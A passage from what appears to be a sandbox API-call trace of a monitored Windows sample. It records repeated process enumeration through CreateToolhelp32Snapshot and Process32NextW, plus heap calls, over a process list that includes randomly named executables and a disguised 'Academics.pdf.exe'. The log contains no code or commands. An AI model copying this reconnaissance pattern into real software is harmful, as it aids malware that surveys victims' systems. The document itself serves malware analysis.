lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0303.138] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0303.139] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0303.140] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.141] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0303.142] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.142] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0303.143] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0303.144] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0303.145] CloseHandle (hObject=0x294) returned 1 [0303.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0303.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0303.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0303.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0303.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0303.145] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0303.145] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0303.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0303.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0303.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0303.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0303.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0303.146] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0303.148] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.149] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0303.149] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0303.150] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.151] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0303.152] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.153] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0303.153] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0303.154] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0303.155] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0303.156] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.157] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.157] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.158] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.159] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.160] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0303.161] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.161] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.162] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0303.163] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0303.164] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0303.164] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0303.165] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.166] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0303.167] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0303.168] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0303.168] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0303.169] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0303.170] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0303.171] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0303.172] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0303.173] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0303.174] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0303.174] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0303.175] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0303.176] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0303.177] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0303.178] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0303.178] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0303.179] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0303.180] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0303.181] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0303.182] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0303.183] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.183] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0303.184] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.185] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0303.186] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0303.187] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0303.187] CloseHandle (hObject=0x294) returned 1 [0303.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0303.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0303.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0303.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0303.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0303.188] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0303.188] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0303.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0303.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0303.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0303.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0303.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0303.188] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0303.191] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.191] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0303.192] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0303.193] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.194] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0303.195] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.195] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0303.196] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0303.197] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0303.198] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0303.214] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0303.214] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0303.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0303.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0303.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0303.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0303.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0303.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0303.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0303.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0303.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0303.215] 